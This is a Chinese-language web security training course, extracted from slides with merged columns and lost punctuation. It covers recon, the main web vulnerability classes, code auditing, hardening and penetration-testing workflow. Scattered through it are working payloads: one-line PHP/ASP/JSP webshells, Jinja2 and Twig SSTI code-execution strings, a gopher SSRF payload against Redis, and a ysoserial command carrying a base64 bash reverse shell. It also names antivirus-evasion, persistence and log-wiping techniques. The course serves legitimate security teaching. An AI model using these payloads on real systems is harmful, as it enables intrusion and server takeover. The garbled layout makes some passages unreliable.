web安全课件

安全全景课件整理Web第一章安Web全基础概述安全的定义与重要性Web安全防护范畴严峻安全形势安全涵盖网站、应用程序、年全球网络攻击事件同比增长Web Web2025服务的全方位安全防护，保护数，应用成为主要攻击目标，Web30%Web据机密性、完整性和可用性安全防护已成为企业生存的重中之重多维防护体系技术与网络攻防演进史Web静态网页时代Web

2.0革命年代初期，简单的页面，安全威胁相对较、流行，攻击面扩大，、业1990HTML AJAXRESTful APICSRF少，主要关注服务器物理安全务逻辑漏洞成为新挑战1234动态应用兴起现代安全时代年代，、、等动态技术普及，、全面普及，云原生、容器化、微服2000PHP ASPJSP HTTP/2HTTPSSQL注入、XSS等漏洞开始大量出现务架构带来新的安全范式网络协议基础与安全核心协议机制TCP/IP协议栈是互联网通信的基础，理解各层协议特性对安全防护至关重要传输层的TCP提供可靠连接，但也可能遭受SYN洪水攻击HTTP/HTTPS协议是Web应用的核心HTTP明文传输存在窃听风险，HTTPS通过SSL/TLS加密保障数据安全掌握请求响应机制、状态码含义、Cookie会话管理等知识是理解Web漏洞的前提加密与攻击防范SSL/TLS加密建立安全通道，防止数据窃听和篡改中间人攻击（MITM）攻击者截获通信，需证书验证防范证书链验证确保通信对象身份真实性前向保密性使用临时密钥，即使长期密钥泄露也不影响历史通信安全安全从协议开始深入理解网络协议的工作原理，是发现漏洞、构建防御的基石每一层协议都有其安全考量，只有全面掌握，才能做到知己知彼，百战不殆第二章信息收集与漏洞识别信息收集是渗透测试的第一步，也是最关键的一步通过系统化的信息收集，可以全面了解目标系统的架构、技术栈、潜在弱点，为后续的漏洞挖掘和利用奠定基础信息收集技术与工具域名信息收集通过Whois查询获取域名注册信息、DNS记录解析、子域名枚举利用工具如sublist3r、OneForAll进行自动化收集1•域名注册信息与联系方式•DNS记录（A、CNAME、MX、TXT）•子域名爆破与关联资产发现端口扫描与服务识别使用Nmap、Masscan等工具进行端口扫描，识别开放服务及版本信息，发现潜在攻击面2•TCP/UDP端口状态探测•服务指纹识别与版本探测•操作系统类型判断搜索引擎与社工利用Google Hacking、Shodan、Fofa等平台进行被动信息收集社会工程学技术获取敏感信息3•敏感文件与目录泄露发现•历史漏洞与补丁信息•员工信息与组织架构常见漏洞分类总览WebWeb应用漏洞种类繁多，系统化分类有助于建立完整的安全知识体系以下是主要漏洞类型及其特征注入类漏洞脚本类漏洞SQL注入数据库查询注入XSS跨站脚本攻击命令注入系统命令执行CSRF跨站请求伪造模板注入模板引擎漏洞点击劫持界面欺骗LDAP/XML注入特定协议注入DOM破坏客户端篡改文件操作类逻辑与权限类文件上传恶意文件植入越权访问权限绕过文件包含任意文件读取业务逻辑流程缺陷目录穿越路径遍历SSRF服务端请求伪造XXE XML外部实体注入反序列化对象注入漏洞攻击链从发现到利用理解完整的攻击链条，有助于构建纵深防御体系每个环节都是防御的机会，也是攻击者需要突破的关卡第三章核心漏洞深度解析与攻防深入剖析最常见、危害最大的漏洞类型，从原理到利用，从检测到防御，构建完整的攻防知识体系本章将通过实战案例，让您真正理解漏洞的Web本质注入实战SQL多数据库注入差异WAF绕过技巧不同数据库系统的SQL语法、函数、特性存在差异，注入技术也需相应调整MySQL支持堆叠查询、UNION注入，常用函数database、version、load_fileOracle强类型系统，需要FROM dual，使用UTL_HTTP进行OOBMSSQL支持xp_cmdshell执行系统命令，可利用OPENROWSET读取文件PostgreSQL支持COPY命令读写文件，可通过大对象实现文件操作高级注入技术盲注技术布尔盲注通过真假条件判断，时间盲注利用sleep函数延时，DNS盲注通过外带数据堆叠注入执行多条SQL语句，可用于INSERT、UPDATE、DELETE操作OOB注入通过DNS、HTTP等协议外带数据，突破无回显限制sqlmap工具推荐自动化SQL注入工具，支持多种数据库、检测技术和绕过方法常用参数--dbs枚举数据库，--tables枚举表，--dump获取数据，--tamper使用混淆脚本常见绕过方法•大小写混淆SeLeCt•注释符插入/**/•编码绕过URL编码、十六进制编码•等价替换and→，or→||•内联注释/*!50000select*/跨站脚本攻击XSS反射型XSS存储型XSS DOM型XSS恶意脚本通过URL参数传递，服务器直接返回并执行需诱使用户点击特制恶意脚本存储在服务器数据库中，每次访问页面时触发危害最大，影响所完全在客户端执行，不经过服务器通过修改页面DOM结构触发，常见于链接，常见于搜索框、错误页面有访问者常见于评论、留言板、用户资料前端框架应用攻击场景钓鱼邮件、社交媒体传播攻击场景论坛、博客、社交网络攻击场景单页应用、前端路由防御机制复杂攻击链CSP策略内容安全策略，限制脚本来源XSS可作为攻击起点，构建复杂攻击链HttpOnly Cookie标记，防止JavaScript读取XSS→CSRF窃取CSRF Token，发起伪造请求输入过滤验证和净化用户输入XSS→RCE通过内网渗透，最终获取服务器权限输出编码HTML实体编码、JavaScript编码X-XSS-Protection浏览器内置XSS过滤器XSS→钓鱼伪造登录页面，窃取凭证跨站请求伪造CSRF0102用户登录目标网站访问恶意网站用户通过正常途径登录受信任的网站A，浏览器保存认证凭证（Cookie、Session）用户在未退出网站A的情况下，访问攻击者构造的恶意网站B0304自动发起请求执行恶意操作恶意网站B通过隐藏表单、图片标签等方式，自动向网站A发起请求，浏览器自动携带认证凭证网站A验证凭证有效，执行操作（转账、修改密码、发帖等），用户毫不知情防御实践Token校验Referer验证为每个敏感操作生成随机Token，服务器验证Token有效性攻击者无法获取Token，无法伪造请求检查HTTP请求头的Referer字段，验证请求来源但Referer可能被篡改或隐私保护而不发送SameSite Cookie//生成CSRF Token$token=bin2hexrandom_bytes32;$_SESSION[csrf_token]=$token;//验证Tokenif$_POST[token]!==$_SESSION[csrf_token]{dieCSRF攻击检测;}设置Cookie的SameSite属性为Strict或Lax，限制第三方网站携带CookieSet-Cookie:session=abc123;SameSite=Strict;HttpOnly;Secure服务端请求伪造SSRFSSRF漏洞利用服务器的信任关系，通过诱使服务器发起请求，访问内网资源、探测端口、读取本地文件，甚至执行任意代码SSRF原理应用接受用户提供的URL参数，服务器使用该URL发起请求攻击者构造特殊URL，使服务器访问内网资产或本地文件常见场景图片加载、文件下载、URL跳转、Webhook回调Gopher伪协议利用Gopher协议可以发送任意TCP数据包，利用SSRF漏洞通过Gopher协议攻击内网服务攻击目标Redis未授权访问、FastCGI执行命令、SMTP发送邮件gopher://

127.

0.

0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a无回显利用当服务器不返回请求结果时，可通过DNS解析记录、HTTP访问日志、延时判断等方式验证漏洞存在外带技术DNSlog、HTTP服务器日志、Burp Collaborator业务逻辑挖掘深入理解应用业务逻辑，发现隐藏的SSRF点关注API接口、第三方集成、定时任务等功能模块防御措施URL白名单、禁止访问内网IP、限制协议类型、网络隔离文件上传漏洞文件上传功能是Web应用的常见特性，但不当的实现可能导致严重的安全问题，包括任意代码执行、网站篡改、服务器控制等类型检测绕过大小写与双写绕过解析漏洞利用前端验证修改文件扩展名或禁用JavaScript绕过大小写混淆.pHp、.AsP绕过黑名单Apache.php.xxx从右向左解析MIME类型修改Content-Type头伪造文件类型双写绕过.pphphp被过滤后变成.php IIS文件名分号截断、PUT方法写入文件头检测在图片文件中嵌入恶意代码（图片马）特殊字符文件名末尾添加空格、点号Nginx畸形解析、%00截断WAF绕过技巧分块传输使用chunked编码绕过检测多文件上传利用数组绕过单文件检测条件竞争快速访问上传的文件文件包含结合LFI漏洞执行上传文件一句话木马植入上传简短的后门代码，通过参数传递执行任意命令php@eval$_POST[cmd];%evalrequestcmd%jsp:expressionRuntime.getRuntime.execrequest.getParametercmd/jsp:expression防御建议

1.文件类型白名单验证

2.重命名上传文件，使用随机名称

3.存储在非Web目录或独立域名

4.限制文件大小和上传频率反序列化漏洞反序列化是将数据结构或对象状态从存储格式恢复的过程当应用反序列化不受信任的数据时，攻击者可构造恶意对象，触发任意代码执行PHP反序列化高版本绕过利用魔术方法（__wakeup、__destruct、__toString等）构造POP链，实现代码执行JDK高版本加入黑名单限制，需寻找新的Gadget链或利用自定义类常见利用点文件操作类、数据库类、缓存类技术寻找新库、链式调用、绕过过滤1234Java反序列化防御策略通过readObject方法触发，利用Commons-Collections、Spring等第三方库构造Gadget链避免反序列化不受信任数据、使用白名单、签名验证、更新依赖库工具ysoserial生成payload最佳实践使用JSON等安全格式ysoserial工具使用ysoserial是Java反序列化利用工具，集成了多种Gadget链，可快速生成恶意payload#生成CommonsCollections1链payloadjava-jar ysoserial.jar CommonsCollections1calc.exepayload.bin#使用其他Gadget链java-jarysoserial.jar CommonsCollections6bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}#查看所有可用Gadget链java-jar ysoserial.jar选择合适的Gadget链取决于目标应用的依赖库版本，需要结合信息收集阶段获取的组件信息安全建议定期更新第三方库，修复已知漏洞实施网络隔离，限制反序列化接口的访问部署WAF或RASP进行实时监控和拦截模板注入与命令执行SSTI模板注入命令注入与RCE服务端模板注入（Server-Side TemplateInjection）发生在应用将用户输入嵌入模板引擎时，攻击者可执行任意代码Python模板注入Jinja2漏洞通过魔术方法和内置函数构造RCE{{.__class__.__mro__

[1].__subclasses__

[104].__init__.__globals__[sys].modules[os].popenwhoami.read}}PHP模板注入Smarty/Twig利用模板语法执行系统命令{php}system$_GET[cmd];{/php}{{_self.env.registerUndefinedFilterCallbackexec}}{{_self.env.getFilterwhoami}}应用执行系统命令时未正确过滤用户输入，导致任意命令执行常见注入点•文件操作tar、zip、unzip•网络工具ping、nslookup、curl•图像处理ImageMagick、ffmpeg•系统命令shell_exec、exec、system命令连接符从信息收集到权限提升的完整攻击路径理解攻击者的思维方式和攻击流程，才能构建有效的防御体系每个阶段都有对应的防御措施，多层防御确保即使某一层被突破，仍有其他防线保护核心资产第四章代码审计与安全加固代码审计是主动发现漏洞的重要手段，通过审查源代码，可以在漏洞被利用前发现并修复本章将介绍不同编程语言的审计重点和安全加固实践语言安全审计重点PHP代码审计Java安全漏洞Node.js安全危险函数eval、assert、system、SQL注入使用Statement而非原型链污染__proto__、exec、passthru、shell_exec、反引号PreparedStatement constructor.prototype文件操作include/require文件包含、XXE XML解析器配置不当命令注入child_process.exec、evalfile_get_contents、fopen、unlink反序列化readObject、XMLDecoder路径穿越fs.readFile、path.join数据库mysqli_query、PDO未使用预编译SpEL注入Spring表达式语言Express安全未设置安全头、CSRF保护缺失、反序列化unserialize处理用户输入Session管理不当SpringBoot Actuator未授权访问、SpEL注入、Thymeleaf SSTI代码审计需要熟悉语言特性、框架机制、常见漏洞模式使用静态分析工具（Fortify、Checkmarx、SonarQube）辅助人工审计，提高效率和覆盖率安全加固与防御技术防火墙WAF网络层访问控制，限制端口和，防止未授权访应用防火墙，检测和拦截恶意请求规则引IP Web问配置入站出站规则，实施最小权限原则擎识别攻击特征，防护SQL注入、XSS等攻击SDL生命周期IDS/IPS安全开发生命周期，将安全融入需求、设入侵检测防御系统，实时监控网络流量和系/计、开发、测试、部署全流程，从源头消除统行为，发现异常活动并告警或阻断漏洞MFA多因子零信任架构多因子认证，结合密码、生物特征、硬件令牌等默认不信任任何人，持续验证身份和权限微隔多种因素，增强身份验证安全性离、最小权限、动态访问控制安全加固是多层次、全方位的体系工程技术防护、管理制度、人员培训三者缺一不可定期评估、持续改进，才能保持安全态势蜜罐技术与溯源分析蜜罐部署策略蜜罐是伪装成真实系统的诱饵，用于吸引攻击者，收集攻击情报，研究攻击手法蜜罐类型低交互蜜罐模拟服务端口，记录扫描和简单攻击高交互蜜罐完整系统环境，允许攻击者深入操作蜜网多个蜜罐组成的网络，模拟真实拓扑客户端蜜罐主动访问可疑网站，检测恶意代码攻击诱捕通过暴露脆弱点、散布虚假信息、设置陷阱文件等方式吸引攻击者监控攻击者行为，收集工具、手法、目标信息溯源技术通过分析攻击者留下的痕迹，追踪其真实身份和位置溯源手段IP地址追踪解析IP归属地，但可能使用代理浏览器指纹User-Agent、分辨率、插件等特征行为分析攻击时间、手法、工具使用习惯社会工程通过社交媒体、论坛等渠道关联身份反向钓鱼诱使攻击者访问特制页面，获取信息第五章渗透测试与攻防实战渗透测试是模拟真实攻击，评估系统安全性的重要手段本章将介绍完整的渗透测试流程、工具使用、云安全、风险管理等实战内容渗透测试流程与工具

1.网络预置搭建测试环境，配置网络拓扑，准备工具和脚本明确测试范围、目标、授权，签订保密协议

2.漏洞扫描使用自动化工具扫描目标系统，发现潜在漏洞工具Nmap、Nessus、OpenVAS、Burp Suite、AWVS

3.漏洞利用针对发现的漏洞编写或使用现成Exploit，验证漏洞可利用性工具Metasploit、Exploit-DB、自研脚本

4.权限获取通过漏洞利用获取初始访问权限，建立Shell连接，上传后门工具Cobalt Strike、Empire、Netcat

5.权限提升从普通用户提升到管理员权限利用系统漏洞、配置错误、弱密码等工具Linux ExploitSuggester、Windows ExploitSuggester

6.后门植入建立持久化访问机制，确保即使系统重启或漏洞修复后仍可访问技术计划任务、启动项、服务、Rootkit免杀技术与反溯源免杀技术反溯源手段绕过杀毒软件和安全防护，使恶意代码不被检测隐藏真实身份和位置，避免被追踪加壳混淆UPX、Themida、VMProtect代理链多层代理、Tor网络代码变形指令替换、垃圾代码插入VPN跳板使用他人服务器作为跳板内存加载无文件攻击，直接在内存中执行痕迹清除删除日志、清理历史记录白名单利用签名文件、系统程序时间混淆随机延时，避免行为模式识别云安全与容器安全Docker容器安全风险容器逃逸技术容器技术带来便利的同时，也引入新的安全挑战从容器内部突破隔离，获取宿主机权限镜像漏洞基础镜像包含已知漏洞，供应链攻击DirtyCow漏洞Linux内核提权漏洞配置错误特权模式运行、挂载敏感目录RunC漏洞（CVE-2019-5736）覆写宿主机RunC容器逃逸利用内核漏洞突破容器隔离特权容器--privileged模式获取完全权限资源滥用未设置资源限制，导致拒绝服务挂载Docker Socket控制宿主机Docker守护进程云平台安全防护合规要求云服务使用需符合行业法规和标准等保

2.0中国网络安全等级保护GDPR欧盟数据保护条例HIPAA美国医疗信息保护PCI-DSS支付卡行业数据安全标准SOC2服务组织控制报告合规不仅是法律要求，更是建立客户信任的基础身份访问管理（IAM）最小权限原则，定期审计网络隔离VPC、安全组、网络策略数据加密传输加密、存储加密、密钥管理日志审计CloudTrail、CloudWatch、操作日志安全运营与风险管理Web风险评估威胁情报识别资产、评估威胁、分析脆弱性、计算风险等级定期评估（季度年度）和事件触发评/收集、分析、共享安全威胁信息，提前预警潜估相结合在风险情报来源安全厂商、社区、暗网监测、蜜罐系统应急响应建立安全事件响应流程检测分析遏制---根除恢复总结制定应急预案，定期演--红蓝对抗练模拟真实攻防场景，红队模拟攻击者，蓝队负团队建设责防御检验防御体系，发现薄弱环节，提升组建专业安全团队渗透测试、安全开发、运实战能力维、应急响应持续培训，提升技能安全运营是持续的过程，需要将技术、流程、人员有机结合建立度量指标（、），持续优化改进，形成安全运营闭环MTTD MTTR攻防对抗实战演练红蓝协作提升安全能力红蓝对抗不是简单的攻防游戏，而是检验和提升整体安全能力的重要手段红队从攻击者视角发现系统弱点蓝队在实战中锻炼防御和响应能力通过持续对抗，组织可以不断,完善安全体系，提高应对真实威胁的能力课程总结与未来趋势核心知识回顾未来安全趋势基础理论网络协议、加密技术、安全原则漏洞挖掘SQL注入、XSS、CSRF、文件上传、反序列化等核心漏洞代码审计多语言安全编码规范，危险函数识别AI辅助安全渗透测试完整攻击链，从信息收集到权限提升安全运营防御体系建设、应急响应、风险管理机器学习用于威胁检测、异常行为分析、自动化漏洞挖掘AI驱动的安全运营中心（SOC）提升响应效率持续学习路径Web安全技术日新月异，需要保持学习态势量子威胁•关注最新漏洞披露和安全资讯•参与CTF竞赛，提升实战能力量子计算对现有加密体系构成挑战，RSA、ECC等算法面临破解风险量子安全密码学研究加速•贡献开源项目，分享技术经验•考取安全认证（OSCP、CEH、CISSP）零信任演进零信任架构成为主流，身份为中心的安全模型取代传统边界防护微隔离、持续验证成为标配致谢与资源分享推荐工具Burp SuiteWeb安全测试瑞士军刀sqlmap自动化SQL注入工具Metasploit渗透测试框架ysoserial Java反序列化利用工具Nmap网络扫描与安全审计Cobalt Strike红队协作平台学习社区Seebug漏洞平台漏洞情报和技术分享先知社区安全技术交流平台FreeBuf网络安全行业门户OWASP开源Web应用安全项目HackerOne漏洞赏金平台GitHub SecurityLab安全研究开源项目DVWA该死的脆弱Web应用WebGoat OWASP安全教学平台VulnHub渗透测试靶场Hack TheBox在线渗透测试实验室PayloadsAllTheThings安全测试Payload合集成为Web安全守护者感谢您完成本课程的学习！Web安全之路充满挑战，但也充满机遇希望您能将所学知识应用于实践，不断探索、持续进步记住，技术本身是中性的，使用技术的目的决定了它的价值让我们一起守护网络安全，构建更安全的数字世界！️。